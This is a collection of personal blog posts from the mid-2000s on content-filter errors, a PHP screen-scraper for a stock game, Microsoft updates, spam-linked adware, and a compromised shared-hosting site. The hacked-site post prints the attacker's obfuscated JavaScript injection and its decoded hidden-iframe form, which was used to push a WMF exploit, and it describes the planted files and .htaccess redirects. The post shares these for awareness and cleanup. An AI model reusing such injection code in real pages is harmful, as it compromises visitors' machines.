Internet Filtering is Dumb

This is not a new story, but the topic of internet content filtering comes up from time to time, so I wanted to post this picture while I remember where it is.

Dumb Internet Filtering

From time to time, somebody suggests that filtering internet content at various points would be a good idea. Invariably, the argument behind it is “Think of the Children. Who is looking out for our children?”

There are all sorts of reasons why the concept is flawed, but one big gaping problem that most people seem to ignore is that filtering software is dumb. Human classifiers would make errors, but manual classification cannot possibly cope with the volume of existing and new content, so filtering software has to try to classify material based on a set of rules. This is always going to fail, both passing content that will offend and blocking inoffensive, important content.

This is not a very sharp photo, but it is the screen of a public internet terminal. The site I am attempting to view in my own twisted, lascivious way is Now instead of the pictures of train timetables without any clothes on that I was expecting to see, instead I get, “This page has been blocked by the Content Filter because it may contain adult content not suitable for a public environment”.

Who is looking out for our adults? Whether they are (relatively) clean living tourists trying to buy a train ticket from Portland to Seattle, or whether they are anorak wearing, trainspotting weirdos who get a perverse kick from looking at Amtrak fare information does not really matter. Adults should be free to look at this and similar transport related “adult content” without having to apply for permission.

On a related note, because filtering software is so dumb, parents should not allow themselves to be lulled into a false sense of security thinking that a machine is doing their job for them. Do you know where your teenager is now? At this very minute, they could be perusing a hard core bus timetable, or even scouring the net for uncensored videos of 747s taking off.

Fun with Alexadex

In case you are not aware, Alexadex is a virtual stock market game, where the values of stocks depend on their Alexa reach ratings.

Because I have too much time on my hands, I wanted to track my portfolio value in the sidebar of my blog. Look over there somewhere —–> and you will probably see it.

In case it holds amusement value to somebody, here is the code. It relies on PHP and MySQL and just does some simple screen scraping.

The fact that this URL works:
hints that there might be an API to do this at some point, but for now, I am screen scraping. (url pulled from Cal Evans’ blog)

The database table looks like this:

CREATE TABLE alexadex (
  timestamp timestamp(14) NOT NULL,
  value int(11) NOT NULL default '0',
  PRIMARY KEY  (timestamp)

From a cron job I am running:



$username = 'tangledweb';
$url = "$username";
$marker = 'total:</b></td><td align=right>$';

$current =  scrape( $url, $marker );
   echo "stored: ";

echo $current;


In case it is not obvious, my Alexadex username is tangledweb.

In my blog sidebar I have:

echo '<li><a href = ""
      >My current portfolio is $';
$temp = getMostRecentFromDb();
echo number_format($temp['value']).'</a>';

The functions these rely on are:

function storeCurrent($value)
 $value = intval($value);
 $sql = "INSERT
         INTO alexadex
         VALUES (NOW(), $value)";
  $result = mysql_query($sql);

function getMostRecentFromDb()
  $sql = "SELECT *
          FROM alexadex
          WHERE 1
          ORDER BY `timestamp` DESC
          LIMIT 1";

  $result = mysql_query($sql);

  return mysql_fetch_array($result);

function scrape($url, $marker, $maxLength = 50)
  $page = file_get_contents($url);
  if($page === false)
    return false;
  $pos = strpos($page, $marker);
  if($pos === false)
    return false;
  $value= substr($page, $pos + strlen($marker), $maxLength);
  $value= str_replace(',', '', $value);
  $value= intval($value);
  return $value;

function connectToDb()
  $connection = mysql_connect("host",
  mysql_select_db("dbname", $connection);

This code comes with no warranty of any kind. You can have it as public domain, but I would appreciate a link to this blog if you use it. I hope it still works. WordPress seems to really, really want to mess with it when it saves it.

Microsoft vs. Spyware

OK, I realise that whining about Microsoft is about as passé as whining about taxation, and about as likely to have any effect, but some similarities struck me the other day.

I was cleaning up some spyware or something from some of my websites and I thought it would be a good idea to make sure that all my windows machines had the Microsoft patch for the WMF vulnerability. Start windows update running, click through the defaults, ignore the 792 page EULA and download what Microsoft classifies as “Critical Updates”.

One of the things people hate most about spyware, adware and their associated inbred toolbars and whatnots is that they use deceptive means to fool people into installing them. They either outright lie, or they provide one attractive feature and embed permission to do whatever else in an incomprehensible 792 page EULA.

Some large software companies behave in a remarkably similar way. What I requested from Microsoft, and what it was implied I was getting, was critical security updates. What I got instead was something called “Windows Genuine Advantage”. Now Bill and I clearly have different ideas about what is critical. To me, something that as far as I can tell just allows Microsoft to check if a computer is running a legal copy of windows is not critical to me. In fact it is not even desirable. The only reason I installed it was because the information provided was a mixture of misleading and too long to read in detail.

In the medium and long term, I think it works to everybody’s disadvantage. The last thing the world needs are more unpatched windows machines connected to the internet, regardless of whether they are unpatched because of owner inaction, or because Microsoft decided to stop providing patches to machines with serial numbers it dislikes, the end effect is the same. More zombie machines wasting bandwidth and probing others because they have been infiltrated through well known vulnerabilities.

Spyware and popups close to home

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleezy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it has been altered and code has been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru extension.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps, such as forums and blogs require you to have some files and directories writable, so if you are choosing such software for a shared host see if you can find ones that require as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely checked stuff sitting on a shared host, it would be worth grepping for some distinctive code from that (perhaps “error_reporting(0)”) to make sure you are not in the same boat.

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate these sort of business practices and the arseclowns that practice them, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

else {


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';

which un-obsfucated is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>

In one file I also found:

<a href = "" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic sounding names created, like date.php and report.php and .htaccess files created or appended to to direct 404s to the new bogus files.

Dark side of the web

This widely carried Associated Press story, amused me.

It is mostly a standard “predators roam MySpace” story. I have no idea why The Agechose to illustrate it with a picture of a stewardess or some sort of tidily dressed woman on a plane. There does not seem to be any indication in the story that rogue stewardesses (or “female flight attendants” if you prefer) are a significant internet problem, but it would explain airlines insistence on turning off mobile devices I suppose.

Buried among the usual concerns and anecdotes that have probably been repeated about every means of communication ever invented is the gem that:

MySpace profiles have been used to threaten classmates and in at least one case, to mock a school principal.

(my emphasis)

It sounds like time we pulled the plug on this whole interweb thingo. Won’t somebody think of the principals? If distributing the Anarchist’s Cookbook was not bad enough, now somebody is mocking a school principal. The horror.

Tagging vs. Meta Tags

So everybody ignores Meta Tags right? Search engines know that poeple put any old junk keywords in them to attract traffic, so search engines completely ignore them.

Tagging on the other hand is flavour of the month. For some reason, blog search engines at least give significant weight to tags, and assume that people are not tag keyword stuffing.

I give it three months.

Tags: *

* Any resemblance between these tags and the post content or the top 5 current searches at technorati is purely coincidental.

Dale Begg-Smith – 'Spam man' wins gold

Dale Begg-Smith, Canadian-Australian Winter Olympic gold medalist is getting strange media coverage. It seems that he does not particularly want to talk about the Internet business that funds his Lamborghini and his skiing lessons.

Here is a newspaper article linking him to and who may not have been operating at the more glamorous end of the internet economy.

Here is a more flattering newspaper article.

Here are some related links so you can make up your own mind blames CPM-Media for the FreeScratchAndWin adware

Official Description: FreeScratchAndWin is an IE spyware Browser Helper Object dressed up as a web ‘scratchcards’ game. (What exactly is available to be won, and whether anybody has ever won it, remains unclear.)

It also highjacks your home- and search-page settings to point to, and complains if you try to change them back.
Comment: Opens pop-up adverts every few minutes.
The software’s terms of use advises that the software can track users’ web usage.
Downloads and installs arbitrary unsigned code as part of an update feature.

And malware

Official Description: Accepting their “second opinion when you surf” actually gives you a toolbar named “Mysearch”. 2nd-thought will redirect your searches as long as it is installed on your computer.
Comment: Browswer hijacker that will reset your home page and often redirect your searches to porn sites. Sometimes it will prevent you from changing your home page. seems to be down.

It does not look like it ever had much content though. is for sale and has a generic for sale page on it now.

It has had content recently.

In 2004 the home page was a removal form for some sort of mass email list:

More recently (but undated from Google cache) it sold popunder advertising.